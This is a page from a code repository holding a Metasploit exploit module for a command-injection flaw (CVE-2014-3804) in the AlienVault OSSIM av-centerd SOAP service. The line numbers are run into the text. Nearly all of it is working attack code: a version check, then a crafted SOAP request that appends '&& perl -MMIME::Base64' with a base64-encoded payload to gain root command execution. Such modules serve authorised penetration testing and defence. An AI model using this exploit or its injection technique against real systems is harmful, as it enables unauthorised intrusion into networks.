Path: blob/master/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb
19778 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'rexml/document'67class MetasploitModule < Msf::Exploit::Remote8Rank = ExcellentRanking910include Msf::Exploit::Remote::HttpClient11include REXML1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'AlienVault OSSIM av-centerd Command Injection',18'Description' => %q{19This module exploits a code execution flaw in AlienVault 4.6.1 and20prior. The vulnerability exists in the av-centerd SOAP web service,21where the update_system_info_debian_package method uses perl backticks22in an insecure way, allowing command injection. This module has been23tested successfully on AlienVault 4.6.0.24},25'Author' => [26'Unknown', # From HP ZDI team, Vulnerability discovery27'juan vazquez' # Metasploit module28],29'License' => MSF_LICENSE,30'References' => [31['CVE', '2014-3804'],32['BID', '67999'],33['ZDI', '14-202'],34['URL', 'http://forums.alienvault.com/discussion/2690']35],36'Privileged' => true,37'Platform' => 'unix',38'Arch' => ARCH_CMD,39'Payload' => {40# 'BadChars' => "[;`$<>|]", # Don't apply bcuz of the perl stub applied41'Compat' => {42'RequiredCmd' => 'perl netcat-e openssl python gawk'43}44},45'DefaultOptions' => {46'SSL' => true47},48'Targets' => [49[ 'AlienVault <= 4.6.1', {}]50],51'DefaultTarget' => 0,52'DisclosureDate' => '2014-05-05',53'Notes' => {54'Stability' => [CRASH_SAFE],55'SideEffects' => [IOC_IN_LOGS],56'Reliability' => [REPEATABLE_SESSION]57}58)59)6061register_options(62[63Opt::RPORT(40007)64]65)66end6768def check69res = send_soap_request('get_dpkg')7071return CheckCode::Unknown('Connection failed') unless res7273version = ''74if res.code == 200 &&75res.headers['SOAPServer'] &&76res.headers['SOAPServer'] =~ /SOAP::Lite/ &&77res.body.to_s =~ /alienvault-center\s*([\d.]*)-\d/7879version = ::Regexp.last_match(1)80end8182return CheckCode::Safe if version.blank?8384if version >= '4.7.0'85return CheckCode::Safe("AlienVault version #{version} is not vulnerable")86end8788CheckCode::Appears("AlienVault version #{version} appears vulnerable")89end9091def exploit92send_soap_request('update_system_info_debian_package', 1)93end9495def build_soap_request(method)96xml = Document.new97xml.add_element(98'soap:Envelope',99{100'xmlns:xsi' => 'http://www.w3.org/2001/XMLSchema-instance',101'xmlns:soapenc' => 'http://schemas.xmlsoap.org/soap/encoding/',102'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema',103'soap:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/',104'xmlns:soap' => 'http://schemas.xmlsoap.org/soap/envelope/'105}106)107body = xml.root.add_element('soap:Body')108m = body.add_element(109method,110{111'xmlns' => 'AV/CC/Util'112}113)114args = []115args[0] = m.add_element('c-gensym3', { 'xsi:type' => 'xsd:string' })116args[1] = m.add_element('c-gensym5', { 'xsi:type' => 'xsd:string' })117args[2] = m.add_element('c-gensym7', { 'xsi:type' => 'xsd:string' })118args[3] = m.add_element('c-gensym9', { 'xsi:type' => 'xsd:string' })119(0..3).each { |i| args[i].text = rand_text_alpha(4..7) }120121if method == 'update_system_info_debian_package'122args[4] = m.add_element('c-gensym11', { 'xsi:type' => 'xsd:string' })123perl_payload = 'system(decode_base64'124perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"125args[4].text = rand_text_alpha(4..7).to_s126args[4].text += " && perl -MMIME::Base64 -e '#{perl_payload}'"127end128129xml.to_s130end131132def send_soap_request(method, timeout = 20)133soap = build_soap_request(method)134135send_request_cgi({136'uri' => '/av-centerd',137'method' => 'POST',138'ctype' => 'text/xml; charset=UTF-8',139'data' => soap,140'headers' => {141'SOAPAction' => "\"AV/CC/Util##{method}\""142}143}, timeout)144end145end146147148